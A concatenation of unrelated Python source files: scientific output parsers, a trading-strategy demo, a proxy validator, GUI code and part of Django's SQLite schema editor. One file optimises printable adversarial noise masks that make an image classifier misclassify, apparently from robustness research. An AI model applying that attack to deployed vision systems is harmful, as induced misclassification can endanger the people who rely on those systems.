def _extract_struc_qe(filename, struc_step):
# ---------- read a file
with open(filename, 'r') as f:
lines = f.readlines()
# ---------- extract struc
read_cell = False
read_coords = False
vc_flag = False # in case of vc-relax
for line in lines:
# ------ cell part
if read_cell:
lattice.append(line.split())
if len(lattice) == 3:
read_cell = False
lattice = np.array(lattice, dtype='float')
if 'CELL_PARAMETERS' in line:
read_cell = True
vc_flag = True
lattice = []
# ------ coords part
if read_coords:
lsplit = line.split()
species.append(lsplit[0])
coords.append(lsplit[1:])
if len(coords) == rin.natot:
read_coords = False
coords = np.array(coords, dtype='float')
# ---- gen struc
if not vc_flag: # empty lattice, use init lattice
lattice = struc_step[0].lattice
struc = Structure(lattice, species, coords)
struc_step.append(struc)
if 'ATOMIC_POSITIONS' in line:
read_coords = True
species = []
coords = []
def get_force_step_qe(force_step_data, current_id, work_path):
'''
get force step data in eV/angstrom
# ---------- args
force_step_data: (dict) the key is structure ID
force_step_data[ID][stage][step]
force_step_data[ID][0] <-- stage 1
force_step_data[ID][1] <-- stage 2
'''
try:
# ---------- read output file
with open(work_path+rin.qe_outfile, 'r') as f:
lines = f.readlines()
# ---------- get force step
force_step = []
read_force = False
final_flag = False # End final coordinates
vc_flag = False # in case of vc-relax
for line in lines:
if 'atom 1 type 1 force' in line:
read_force = True
force = []
if read_force:
force.append(line.split()[6:])
if len(force) == rin.natot:
read_force = False
force_step.append(utility.ry2ev / utility.bohr2ang * np.array(
force, dtype='float'))
# ------ check opt and vc-relax
if 'End final coordinates' in line:
final_flag = True
if 'CELL_PARAMETERS' in line:
vc_flag = True
# ------ delete last energy (after End final coordinates)
if final_flag and vc_flag:
force_step.pop(-1)
# ------ if empty
if len(force_step) == 0:
force_step = None
print('#### ID: {0}: failed to parse force_step\n'.format(
current_id), file=sys.stderr)
except Exception as e:
force_step = None
print(e, '#### ID: {0}: failed to parse in force_step\n'.format(
current_id), file=sys.stderr)
# ---------- append force_step
if force_step_data.get(current_id) is None:
force_step_data[current_id] = [] # initialize
force_step_data[current_id].append(force_step)
# ---------- save force_step_data
pkl_data.save_force_step(force_step_data)
# ---------- return
return force_step_data
def get_stress_step_qe(stress_step_data, current_id, work_path):
'''
get stress step data in eV/ang**3
# ---------- args
stress_step_data: (dict) the key is structure ID
stress_step_data[ID][stage][step]
stress_step_data[ID][0] <-- stage 1
stress_step_data[ID][1] <-- stage 2
'''
try:
# ---------- read output file
with open(work_path+rin.qe_outfile, 'r') as f:
lines = f.readlines()
# ---------- get stress step
stress_step = []
read_stress = False
final_flag = False # End final coordinates
vc_flag = False # in case of vc-relax
for line in lines:
if read_stress:
stress.append(line.split()[3:])
if len(stress) == 3:
read_stress = False
stress_step.append(utility.kbar2ev_ang3 * np.array(
stress, dtype='float'))
if 'total stress (Ry/bohr**3)' in line:
read_stress = True
stress = []
# ------ check opt and vc-relax
if 'End final coordinates' in line:
final_flag = True
if 'CELL_PARAMETERS' in line:
vc_flag = True
# ------ delete last energy (after End final coordinates)
if final_flag and vc_flag:
stress_step.pop(-1)
# ------ if empty
if len(stress_step) == 0:
stress_step = None
print('#### ID: {0}: failed to parse stress_step\n'.format(
current_id), file=sys.stderr)
except Exception as e:
stress_step = None
print(e, '#### ID: {0}: failed to parse in stress_step\n'.format(
current_id), file=sys.stderr)
# ---------- append stress_step
if stress_step_data.get(current_id) is None:
stress_step_data[current_id] = [] # initialize
stress_step_data[current_id].append(stress_step)
# ---------- save stress_step_data
pkl_data.save_stress_step(stress_step_data)
# ---------- return
return stress_step_data
|
py | 1a4b93997c9dc7234dfbc61090bb1920eda5c2ce | '''
Generates noise by using multiple images by using the Adam optimizer method.
This script DOES use the inverse mask.
'''
from utils import get_adv_target, load_norm_mask, setup_attack_graph, report_extreme_values, load_many_images, get_print_triplets
import keras
import tensorflow as tf
from tensorflow.python.platform import app
from tensorflow.python.platform import flags
import os
import numpy as np
import cv2
from cleverhans.utils_tf import model_loss
from scipy.misc import imread, imsave
import sys
import math
#set parameters for attack
FLAGS = flags.FLAGS
def main(argv=None):
print("going into setup")
op, model, sess, pholders, varops = setup_attack_graph()
data = load_many_images(FLAGS.attack_srcdir)
num_images = len(data)
feed_dict = {pholders['image_in']: data,
pholders['attack_target']: get_adv_target(nb_inputs = num_images),
pholders['noise_mask']: load_norm_mask(),
keras.backend.learning_phase(): 0}
if FLAGS.printability_optimization:
feed_dict[pholders['printable_colors']] = get_print_triplets(FLAGS.printability_tuples)
# used to save checkpoints after each epoch
saver = tf.train.Saver(max_to_keep=50)
# debug: sanity check to make sure the model isn't being adjusted
# i.e. this should stay constant
if FLAGS.fullres_input:
clean_model_loss = model_loss(pholders['attack_target'], model(tf.image.resize_images(pholders['image_in'], (FLAGS.img_rows,FLAGS.img_cols))), mean=True)
else:
clean_model_loss = model_loss(pholders['attack_target'], model(pholders['image_in']), mean=True)
for i in range(FLAGS.attack_epochs):
print('Epoch %d'%i),
sys.stdout.flush()
if not FLAGS.fullres_input:
_, train_loss, noisy_in, clean_loss, clean_classes, noisy_classes = sess.run( \
(op, \
varops['adv_loss'], \
varops['noise_inputs'], \
clean_model_loss, \
model(pholders['image_in']), \
varops['adv_pred']) \
, feed_dict=feed_dict)
else:
_, train_loss, noisy_in, clean_loss, clean_classes, noisy_classes, rnin = sess.run( \
(op, \
varops['adv_loss'], \
varops['noise_inputs'], \
clean_model_loss, \
model(tf.image.resize_images(pholders['image_in'], (FLAGS.img_rows,FLAGS.img_cols))), \
varops['adv_pred'], \
varops['resized_noise_in']) \
, feed_dict=feed_dict)
print(model(tf.image.resize_images(pholders['image_in'], (FLAGS.img_rows,FLAGS.img_cols))))
print("adversarial loss %.5f model loss on clean img: %.5f"%(train_loss, clean_loss)),
sys.stdout.flush()
if FLAGS.printability_optimization:
print("noise NPS %.5f"%sess.run(varops['printer_error'], feed_dict=feed_dict)),
# num_misclassified = 0
# for j in range(num_images):
# clean_classification = np.argmax(clean_classes[j])
# noise_classification = np.argmax(noisy_classes[j])
# if clean_classification != noise_classification:
# num_misclassified += 1
# proportion_misclassified = float(num_misclassified)/float(num_images)
# print('percent misclassified images %.1f'%(proportion_misclassified*100.0))
# if i%FLAGS.save_frequency == 0 or proportion_misclassified > 0.9:
# saver.save(sess, os.path.join('optimization_output', FLAGS.checkpoint, 'model', FLAGS.checkpoint), global_step=i)
# imsave(os.path.join('optimization_output', FLAGS.checkpoint, "noisy_images", "noisyimg_%s_epoch_%d.png"%(FLAGS.checkpoint,i)), (noisy_in[0]*255).astype(int))
# if FLAGS.fullres_input:
# imsave(os.path.join('optimization_output', FLAGS.checkpoint, "nimage_downsized_%d.png"%i), rnin[0])
# imsave(os.path.join('optimization_output', FLAGS.checkpoint, "noise_downsized_%d.png"%i),sess.run(varops['noise']))
print()
### end of epoch
sess.close()
for i in range(num_images):
imsave(os.path.join('optimization_output', FLAGS.checkpoint, "noisy-set", "%d.png"%(i)), (noisy_in[i]*255).astype(int))
if __name__ == '__main__':
app.run()
|
py | 1a4b93e1e04d0f803bc3a8a285242f892995b7b5 | # encoding: UTF-8
from vnpy.trader.app.optionMaster.omStrategy import OmStrategyTemplate
########################################################################
class DemoStrategy(OmStrategyTemplate):
"""演示策略"""
className = 'DemoStrategy'
author = u'用Python的交易员'
temp = 123
# 参数列表,保存了参数的名称
paramList = ['name',
'className',
'author',
'vtSymbols',
'temp']
# 变量列表,保存了变量的名称
varList = ['inited',
'trading']
#----------------------------------------------------------------------
def __init__(self, engine, setting):
"""Constructor"""
super(DemoStrategy, self).__init__(engine, setting)
#----------------------------------------------------------------------
def onInit(self):
"""初始化"""
self.writeLog(u'%s策略初始化' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onStart(self):
"""启动"""
self.writeLog(u'%s策略启动' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onStop(self):
"""停止"""
self.writeLog(u'%s策略停止' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onTick(self, tick):
"""行情推送"""
self.writeLog(u'%s策略收到行情推送' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onTrade(self, trade):
"""成交推送"""
self.writeLog(u'%s策略收到成交推送' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onOrder(self, order):
"""委托推送"""
self.writeLog(u'%s策略收到委托推送' %self.name)
self.putEvent()
#----------------------------------------------------------------------
def onTimer(self):
"""定时推送"""
self.writeLog(u'%s策略收到定时推送,自定义参数%s' %(self.name, self.temp))
|
py | 1a4b94567c32707bf318eaf906d290d42d4aaabd | '''
@Author: [email protected]
@Date: 2020-03-01 18:33:41
@LastEditors: [email protected]
@LastEditTime: 2020-03-10 19:51:30
@Description: 代理校验器
'''
import os
import requests
import asyncio
import time
import json
import ssl
from GeeProxy.utils.logger import proxy_validator
from aiohttp import ClientSession, ClientTimeout, ClientError, ClientSSLError
from aiohttp.client_exceptions import ClientHttpProxyError
from aiohttp_proxy import ProxyConnector
from GeeProxy.settings import VAILDATORS_TIMEOUT,\
VAILDATORS_RETRY, PROXY_REQUEST_DELAY, PUBLIC_IP,\
ANONYMOUS_CHECK_API
from GeeProxy.utils.user_agent import UserAgent
class AiohttpSingleton(ClientSession):
'''
This is a redis singleton connect client class
'''
def __new__(cls, *args, **keywords):
pid = os.getpid()
if not hasattr(cls, '_instance') or pid != cls._pid:
print("Aiohttp PID is {} and father PID is {}".format(
os.getpid(), os.getppid()))
if hasattr(cls, "_pid"):
print("Aiohttp Instance PID is {} and PID is {}".format(
cls._pid, pid))
cls._instance = ClientSession(*args, **keywords)
cls._pid = os.getpid()
return cls._instance
@property
def connector(self, connector):
proxy_connector = connector
self._instance._connector = proxy_connector
class ValidateResult:
"""
校验结果
"""
def __init__(self, proxy=None, web_key=None, delay=-1, dst=None, useful=1):
"""
:param proxy: 代理地址
:param web_key: 缓存key
:param delay: 延迟
:param dst: 目标站点
:param useful: 是否可用
"""
# 代理地址
self.proxy = proxy
# 缓存key
self.web_key = web_key
# 延迟
self.delay = delay
# 目标站点
self.dst = dst
# 是否为可匿代理
# self.anonymous = anonymous
# 是否可用
self.available = useful
class ProxyValidator:
"""
异步代理校验器,校验过程如下,通过代理请求目标站点,若超时,
则重试,当重试次数大于给定的阈值时,请求仍失败就认为这个代理不可用,
期间会计算请求过程的延迟。
"""
def __init__(self):
self._retry = 0
self._timeout = ClientTimeout(total=VAILDATORS_TIMEOUT)
self._ua = UserAgent()
self._result = {}
async def check_proxy(self, proxy: str, dst: str, web_key: str) -> ValidateResult:
"""
校验代理的可用性
:param proxy: 待校验的代理
:param dst: 目标站点地址
:param web_key: 目标站点
:return: 校验结果
"""
result = ValidateResult(proxy=proxy, delay=-1, web_key=web_key, dst=dst, useful=1)
time_start = time.time()
try:
# 启用代理
connector = ProxyConnector(verify_ssl=False).from_url(proxy)
requests.urllib3.disable_warnings()
# 异步http请求
async with ClientSession(connector=connector,
timeout=self._timeout) as session:
params = {
"url": dst,
"verify_ssl": False,
"timeout": self._timeout,
"headers": {
"User-Agent": self._ua.random()
}
}
# verify_ssl = False
if "https" in proxy.split(":"):
params["verify_ssl"] = False
# 异步http请求
async with session.get(**params) as response:
proxy_validator.info(
"wait proxy {} for {} response".format(proxy, dst))
await response.text()
await session.close()
time_end = time.time()
delay = time_end - time_start
proxy_validator.info(
"check proxy {} for {} success cost {} s".format(
proxy, dst, delay))
result.delay = delay
result.available = 1
# 请求超时就认为代理不可用
if delay > PROXY_REQUEST_DELAY:
result.available = 0
return result
except (BaseException, asyncio.TimeoutError, ClientError,
ClientHttpProxyError, ClientSSLError) as e:
err_msg = e
if isinstance(e, asyncio.TimeoutError) or isinstance(
e, ClientHttpProxyError):
err_msg = "Http request timeout"
if not isinstance(e, ClientSSLError) or not isinstance(
e, ssl.SSLError):
result.available = 0
# 重试
if self._retry <= VAILDATORS_RETRY:
# 重试次数小于阈值就再试一次
self._retry = self._retry + 1
result = await self.check_proxy(proxy, dst, web_key)
return result
time_end = time.time()
proxy_validator.error("check proxy {} {} times fail for {} "
"and cost {} s".format(proxy, self._retry, dst, time_end - time_start))
proxy_validator.error("check proxy {} for {} "
"error:{} type {}".format(proxy, dst, err_msg, type(e)))
self._retry = 0
result.delay = time_end - time_start
return result
@staticmethod
async def check_anonymous(proxy: str) -> bool:
"""
检测代理的匿名程度
:param proxy: 待校验的代理
:return: 校验结果,如果是高匿代理就返回True
"""
anonymous = True
try:
connector = ProxyConnector.from_url(proxy)
requests.urllib3.disable_warnings()
ua = UserAgent()
async with ClientSession(connector=connector, timeout=5) as session:
# 异步http请求
async with session.get(ANONYMOUS_CHECK_API,
ssl=False,
headers={"User-Agent": ua.random()},
timeout=5) as response:
res = await response.text()
res = json.loads(res)
anonymous = ProxyValidator.is_anonymous(res)
if anonymous:
proxy_validator.info("The proxy {} is anonymous".format(proxy))
await session.close()
return anonymous
except Exception as e:
proxy_validator.error("Checking proxy {} anonymous "
"has an error:{} type {}".format(proxy, str(e), type(e)))
raise ClientError("check anonymous")
@staticmethod
def is_anonymous(response: dict) -> bool:
"""
通过接口判断当前代理的可匿程度
:param response: 请检测api的响应
:return: 校验结果,如果是高匿代理就返回True
"""
origin = response["origin"]
proxy_connection = response.get("Proxy-Connection", "")
proxy_validator.info(
"Checking anonymous proxy response is {}".format(response))
if origin != PUBLIC_IP and not proxy_connection:
return True
return False
|
py | 1a4b94598b18d36d49078e427ec12454997a5ba3 | # Copyright 2015 Tesora Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from trove.tests.scenario.helpers.mysql_helper import MysqlHelper
class MariadbHelper(MysqlHelper):
def __init__(self, expected_override_name):
super(MariadbHelper, self).__init__(expected_override_name)
|
py | 1a4b94d7404d252510fa119d965886891d164418 | from functools import partial
from pubsub import pub
from threading import Thread
from time import sleep
import wx
from wx.lib.agw.floatspin import FloatSpin
from spacq.gui.tool.box import load_csv, save_csv, Dialog, MessageDialog
from spacq.interface.units import Quantity
"""
Configuration for a ch4VoltageSource.
"""
class ch4VoltageSourceTunerDialog(Dialog):
"""
A dialog for tuning a voltage source port.
"""
def __init__(self, parent, global_store, ok_callback, port, *args, **kwargs):
Dialog.__init__(self, parent, title='Port {0} tuning'.format(port.num))
self.global_store = global_store
self.ok_callback = ok_callback
self.port = port
# Dialog.
dialog_box = wx.BoxSizer(wx.VERTICAL)
## Self-calibration.
calibration_static_box = wx.StaticBox(self, label='DAC self-calibration')
calibration_box = wx.StaticBoxSizer(calibration_static_box, wx.VERTICAL)
dialog_box.Add(calibration_box, flag=wx.EXPAND|wx.ALL, border=5)
self.calibrate_button = wx.Button(self, label='Self-calibrate')
self.Bind(wx.EVT_BUTTON, self.OnCalibrate, self.calibrate_button)
calibration_box.Add(self.calibrate_button, flag=wx.EXPAND)
## Tuning.
tuning_static_box = wx.StaticBox(self, label='Tuning')
tuning_box = wx.StaticBoxSizer(tuning_static_box, wx.VERTICAL)
dialog_box.Add(tuning_box, flag=wx.EXPAND)
### Autotune.
autotuning_static_box = wx.StaticBox(self, label='Autotuning')
autotuning_box = wx.StaticBoxSizer(autotuning_static_box, wx.VERTICAL)
tuning_box.Add(autotuning_box, flag=wx.EXPAND|wx.ALL, border=5)
autotuning_sizer = wx.FlexGridSizer(rows=3, cols=2, hgap=5)
autotuning_box.Add(autotuning_sizer, flag=wx.CENTER)
autotuning_sizer.Add(wx.StaticText(self, label='Resource name:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.resource_name_input = wx.TextCtrl(self, size=(300,-1))
autotuning_sizer.Add(self.resource_name_input)
autotuning_sizer.Add(wx.StaticText(self, label='Max:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.automax_input = FloatSpin(self, value=1, min_val=-10, max_val=10, increment=1,
digits=5)
autotuning_sizer.Add(self.automax_input)
autotuning_sizer.Add(wx.StaticText(self, label='Min:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.automin_input = FloatSpin(self, value=-1, min_val=-10, max_val=10, increment=1,
digits=5)
autotuning_sizer.Add(self.automin_input)
self.autotune_button = wx.Button(self, label='Autotune')
self.Bind(wx.EVT_BUTTON, self.OnAutotune, self.autotune_button)
autotuning_box.Add(self.autotune_button, flag=wx.EXPAND)
### Manual tune.
tuning_sizer = wx.FlexGridSizer(rows=2, cols=2, hgap=5)
tuning_box.Add(tuning_sizer, flag=wx.CENTER)
tuning_sizer.Add(wx.StaticText(self, label='Gain:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.gain_input = FloatSpin(self, value=0, min_val=-1e6, max_val=1e6, increment=1,
digits=5)
tuning_sizer.Add(self.gain_input)
tuning_sizer.Add(wx.StaticText(self, label='Offset:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.offset_input = FloatSpin(self, value=0, min_val=-1e6, max_val=1e6, increment=1,
digits=5)
tuning_sizer.Add(self.offset_input)
## End buttons.
button_box = wx.BoxSizer(wx.HORIZONTAL)
dialog_box.Add(button_box, flag=wx.CENTER|wx.ALL, border=5)
ok_button = wx.Button(self, wx.ID_OK)
self.Bind(wx.EVT_BUTTON, self.OnOk, ok_button)
button_box.Add(ok_button)
cancel_button = wx.Button(self, wx.ID_CANCEL)
button_box.Add(cancel_button)
self.SetSizerAndFit(dialog_box)
def autotune(self, resource):
gain, offset = self.port.autotune(resource, set_result=False,
min_value=self.automin_input.GetValue(),
max_value=self.automax_input.GetValue())
wx.CallAfter(self.gain_input.SetValue, gain)
wx.CallAfter(self.offset_input.SetValue, offset)
wx.CallAfter(self.autotune_button.Enable)
def self_calbrate(self):
self.port.apply_settings(calibrate=True)
sleep(self.port.calibration_delay)
wx.CallAfter(self.calibrate_button.Enable)
def SetValue(self, gain, offset):
self.gain_input.SetValue(gain)
self.offset_input.SetValue(offset)
def GetValue(self):
return (self.gain_input.GetValue(), self.offset_input.GetValue())
def OnAutotune(self, evt=None):
name = self.resource_name_input.Value
if not name:
MessageDialog(self, 'No resource provided').Show()
return
try:
resource = self.global_store.resources[name]
except KeyError:
MessageDialog(self, name, 'Missing resource').Show()
return
if not resource.readable:
MessageDialog(self, name, 'Unreadable resource').Show()
return
self.autotune_button.Disable()
thr = Thread(target=self.autotune, args=(resource,))
thr.daemon = True
thr.start()
def OnCalibrate(self, evt=None):
self.calibrate_button.Disable()
thr = Thread(target=self.self_calbrate)
thr.daemon = True
thr.start()
def OnOk(self, evt=None):
self.ok_callback(self)
self.Destroy()
class ch4VoltageSourceSettingsPanel(wx.Panel):
"""
All the settings for a voltage source.
"""
def __init__(self, parent, global_store, vsrc, *args, **kwargs):
wx.Panel.__init__(self, parent, *args, **kwargs)
self.global_store = global_store
self.vsrc = vsrc
self.port_value_inputs = []
self.port_buttons = []
# Panel.
panel_box = wx.BoxSizer(wx.VERTICAL)
## Ports.
ports_box = wx.FlexGridSizer(rows=3, cols=2)
panel_box.Add(ports_box)
for port in range(4):
port_static_box = wx.StaticBox(self, label='Port {0} '.format(port))
port_box = wx.StaticBoxSizer(port_static_box, wx.HORIZONTAL)
ports_box.Add(port_box, flag=wx.ALL, border=5)
spin = FloatSpin(self, value=0, min_val=-10, max_val=10, increment=1, digits=6)
self.port_value_inputs.append(spin)
port_box.Add(spin)
port_box.Add(wx.StaticText(self, label='V'))
set_button = wx.Button(self, label='Set', style=wx.BU_EXACTFIT)
set_button.Bind(wx.EVT_BUTTON, partial(self.OnSetVoltage, port))
port_box.Add(set_button)
tune_button = wx.Button(self, label='Tune...', style=wx.BU_EXACTFIT)
tune_button.Bind(wx.EVT_BUTTON, partial(self.OnTune, port))
port_box.Add(tune_button)
self.port_buttons.append((set_button, tune_button))
## All ports.
button_static_box = wx.StaticBox(self, label='All ports')
button_box = wx.StaticBoxSizer(button_static_box, wx.HORIZONTAL)
panel_box.Add(button_box, flag=wx.CENTER)
### Zero.
zero_all_button = wx.Button(self, label='Zero')
self.Bind(wx.EVT_BUTTON, self.OnZeroAll, zero_all_button)
button_box.Add(zero_all_button, flag=wx.CENTER)
### Self-calibrate.
self.calibrate_all_button = wx.Button(self, label='Self-calibrate')
self.Bind(wx.EVT_BUTTON, self.OnCalibrateAll, self.calibrate_all_button)
button_box.Add(self.calibrate_all_button, flag=wx.CENTER)
### Load tuning.
tuning_data_static_box = wx.StaticBox(self, label='Tuning data')
tuning_data_box = wx.StaticBoxSizer(tuning_data_static_box, wx.HORIZONTAL)
button_box.Add(tuning_data_box)
#### Save.
tuning_data_save_button = wx.Button(self, label='Save...')
self.Bind(wx.EVT_BUTTON, self.OnSave, tuning_data_save_button)
tuning_data_box.Add(tuning_data_save_button)
#### Load.
tuning_data_load_button = wx.Button(self, label='Load...')
self.Bind(wx.EVT_BUTTON, self.OnLoad, tuning_data_load_button)
tuning_data_box.Add(tuning_data_load_button)
self.SetSizer(panel_box)
def self_calbrate_all(self):
delay = 0 # s
for port in self.vsrc.ports:
# Use the largest delay.
if port.calibration_delay > delay:
delay = port.calibration_delay
port.apply_settings(calibrate=True)
sleep(delay)
wx.CallAfter(self.calibrate_all_button.Enable)
def zero_all(self):
for port in self.vsrc.ports:
port.voltage = Quantity(0.0, 'V')
def OnSetVoltage(self, port_num, evt=None):
try:
self.vsrc.ports[port_num].voltage = Quantity(self.port_value_inputs[port_num].GetValue(), 'V')
except ValueError as e:
MessageDialog(self, str(e), 'Invalid value').Show()
def OnTune(self, port_num, evt=None):
port = self.vsrc.ports[port_num]
def ok_callback(dlg):
port.gain, port.offset = dlg.GetValue()
dlg = ch4VoltageSourceTunerDialog(self, self.global_store, ok_callback, port)
dlg.SetValue(port.gain, port.offset)
dlg.Show()
def OnCalibrateAll(self, evt=None):
self.calibrate_all_button.Disable()
thr = Thread(target=self.self_calbrate_all)
thr.daemon = True
thr.start()
def OnZeroAll(self, evt=None):
thr = Thread(target=self.zero_all)
thr.daemon = True
thr.start()
def OnSave(self, evt=None):
values = [[port.gain, port.offset] for port in self.vsrc.ports]
try:
save_csv(self, values)
except IOError as e:
MessageDialog(self, str(e), 'Save error').Show()
return
def OnLoad(self, evt=None):
try:
result = load_csv(self)
if result is None:
return
has_header, values, _ = result
if has_header:
port_values = values[1:]
else:
port_values = values
if len(port_values) != len(self.vsrc.ports):
raise ValueError('Invalid number of ports.')
for i, port_value in enumerate(port_values):
if len(port_value) != 2:
raise ValueError('Invalid number of settings for port {0}.'.format(i))
try:
float(port_value[0])
float(port_value[1])
except TypeError:
raise ValueError('Not a number for port {0}.'.format(i))
except (IOError, ValueError) as e:
MessageDialog(self, str(e), 'Load error').Show()
return
for port, values in zip(self.vsrc.ports, port_values):
port.gain = float(values[0])
port.offset = float(values[1])
class ch4VoltageSourceSettingsDialog(Dialog):
"""
A wrapper for ch4VoltageSourceSettingsPanel.
"""
def __init__(self, parent, global_store, vsrc_name, *args, **kwargs):
# If the device doesn't exist, give up.
try:
vsrc = global_store.devices[vsrc_name].device
except (KeyError, AttributeError):
self.Destroy()
return
Dialog.__init__(self, parent, title='Four channel voltage source settings', *args, **kwargs)
self.vsrc_name = vsrc_name
# Dialog.
dialog_box = wx.BoxSizer(wx.VERTICAL)
## Settings panel.
self.panel = ch4VoltageSourceSettingsPanel(self, global_store, vsrc)
dialog_box.Add(self.panel)
self.SetSizerAndFit(dialog_box)
# Subscriptions.
pub.subscribe(self.msg_device, 'device.added')
pub.subscribe(self.msg_device, 'device.removed')
def msg_device(self, name, value=None):
if name == self.vsrc_name:
# Device has changed, so we can't trust it anymore.
self.Destroy()
return
|
py | 1a4b94fa826b56c95d46d8dda64d01fc0db7b0e6 | import copy
from decimal import Decimal
from django.apps.registry import Apps
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.db.backends.ddl_references import Statement
from django.db.transaction import atomic
from django.db.utils import NotSupportedError
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_delete_table = "DROP TABLE %(table)s"
sql_create_inline_fk = "REFERENCES %(to_table)s (%(to_column)s) DEFERRABLE INITIALLY DEFERRED"
sql_create_unique = "CREATE UNIQUE INDEX %(name)s ON %(table)s (%(columns)s)"
sql_delete_unique = "DROP INDEX %(name)s"
sql_foreign_key_constraint = None
def __enter__(self):
# Some SQLite schema alterations need foreign key constraints to be
# disabled. Enforce it here for the duration of the schema edition.
if not self.connection.disable_constraint_checking():
raise NotSupportedError(
'SQLite schema editor cannot be used while foreign key '
'constraint checks are enabled. Make sure to disable them '
'before entering a transaction.atomic() context because '
'SQLite does not support disabling them in the middle of '
'a multi-statement transaction.'
)
return super().__enter__()
def __exit__(self, exc_type, exc_value, traceback):
self.connection.check_constraints()
super().__exit__(exc_type, exc_value, traceback)
self.connection.enable_constraint_checking()
def quote_value(self, value):
# The backend "mostly works" without this function and there are use
# cases for compiling Python without the sqlite3 libraries (e.g.
# security hardening).
try:
import sqlite3
value = sqlite3.adapt(value)
except ImportError:
pass
except sqlite3.ProgrammingError:
pass
# Manual emulation of SQLite parameter quoting
if isinstance(value, bool):
return str(int(value))
elif isinstance(value, (Decimal, float, int)):
return str(value)
elif isinstance(value, str):
return "'%s'" % value.replace("\'", "\'\'")
elif value is None:
return "NULL"
elif isinstance(value, (bytes, bytearray, memoryview)):
# Bytes are only allowed for BLOB fields, encoded as string
# literals containing hexadecimal data and preceded by a single "X"
# character.
return "X'%s'" % value.hex()
else:
raise ValueError("Cannot quote parameter value %r of type %s" % (value, type(value)))
def _is_referenced_by_fk_constraint(self, table_name, column_name=None, ignore_self=False):
"""
Return whether or not the provided table name is referenced by another
one. If `column_name` is specified, only references pointing to that
column are considered. If `ignore_self` is True, self-referential
constraints are ignored.
"""
with self.connection.cursor() as cursor:
for other_table in self.connection.introspection.get_table_list(cursor):
if ignore_self and other_table.name == table_name:
continue
constraints = self.connection.introspection._get_foreign_key_constraints(cursor, other_table.name)
for constraint in constraints.values():
constraint_table, constraint_column = constraint['foreign_key']
if (constraint_table == table_name and
(column_name is None or constraint_column == column_name)):
return True
return False
def alter_db_table(self, model, old_db_table, new_db_table, disable_constraints=True):
if (not self.connection.features.supports_atomic_references_rename and
disable_constraints and self._is_referenced_by_fk_constraint(old_db_table)):
if self.connection.in_atomic_block:
raise NotSupportedError((
'Renaming the %r table while in a transaction is not '
'supported on SQLite < 3.26 because it would break referential '
'integrity. Try adding `atomic = False` to the Migration class.'
) % old_db_table)
self.connection.enable_constraint_checking()
super().alter_db_table(model, old_db_table, new_db_table)
self.connection.disable_constraint_checking()
else:
super().alter_db_table(model, old_db_table, new_db_table)
def alter_field(self, model, old_field, new_field, strict=False):
old_field_name = old_field.name
table_name = model._meta.db_table
_, old_column_name = old_field.get_attname_column()
if (new_field.name != old_field_name and
not self.connection.features.supports_atomic_references_rename and
self._is_referenced_by_fk_constraint(table_name, old_column_name, ignore_self=True)):
if self.connection.in_atomic_block:
raise NotSupportedError((
'Renaming the %r.%r column while in a transaction is not '
'supported on SQLite < 3.26 because it would break referential '
'integrity. Try adding `atomic = False` to the Migration class.'
) % (model._meta.db_table, old_field_name))
with atomic(self.connection.alias):
super().alter_field(model, old_field, new_field, strict=strict)
# Follow SQLite's documented procedure for performing changes
# that don't affect the on-disk content.
# https://sqlite.org/lang_altertable.html#otheralter
with self.connection.cursor() as cursor:
schema_version = cursor.execute('PRAGMA schema_version').fetchone()[0]
cursor.execute('PRAGMA writable_schema = 1')
references_template = ' REFERENCES "%s" ("%%s") ' % table_name
new_column_name = new_field.get_attname_column()[1]
search = references_template % old_column_name
replacement = references_template % new_column_name
cursor.execute('UPDATE sqlite_master SET sql = replace(sql, %s, %s)', (search, replacement))
cursor.execute('PRAGMA schema_version = %d' % (schema_version + 1))
cursor.execute('PRAGMA writable_schema = 0')
# The integrity check will raise an exception and rollback
# the transaction if the sqlite_master updates corrupt the
# database.
cursor.execute('PRAGMA integrity_check')
# Perform a VACUUM to refresh the database representation from
# the sqlite_master table.
with self.connection.cursor() as cursor:
cursor.execute('VACUUM')
else:
super().alter_field(model, old_field, new_field, strict=strict)
def _remake_table(self, model, create_field=None, delete_field=None, alter_field=None):
"""
Shortcut to transform a model from old_model into new_model
This follows the correct procedure to perform non-rename or column
addition operations based on SQLite's documentation
https://www.sqlite.org/lang_altertable.html#caution
The essential steps are:
1. Create a table with the updated definition called "new__app_model"
2. Copy the data from the existing "app_model" table to the new table
3. Drop the "app_model" table
4. Rename the "new__app_model" table to "app_model"
5. Restore any index of the previous "app_model" table.
"""
# Self-referential fields must be recreated rather than copied from
# the old model to ensure their remote_field.field_name doesn't refer
# to an altered field.
def is_self_referential(f):
return f.is_relation and f.remote_field.model is model
# Work out the new fields dict / mapping
body = {
f.name: f.clone() if is_self_referential(f) else f
for f in model._meta.local_concrete_fields
}
# Since mapping might mix column names and default values,
# its values must be already quoted.
mapping = {f.column: self.quote_name(f.column) for f in model._meta.local_concrete_fields}
# This maps field names (not columns) for things like unique_together
rename_mapping = {}
# If any of the new or altered fields is introducing a new PK,
# remove the old one
restore_pk_field = None
if getattr(create_field, 'primary_key', False) or (
alter_field and getattr(alter_field[1], 'primary_key', False)):
for name, field in list(body.items()):
if field.primary_key:
field.primary_key = False
restore_pk_field = field
if field.auto_created:
del body[name]
del mapping[field.column]
# Add in any created fields
if create_field:
body[create_field.name] = create_field
# Choose a default and insert it into the copy map
if not create_field.many_to_many and create_field.concrete:
mapping[create_field.column] = self.quote_value(
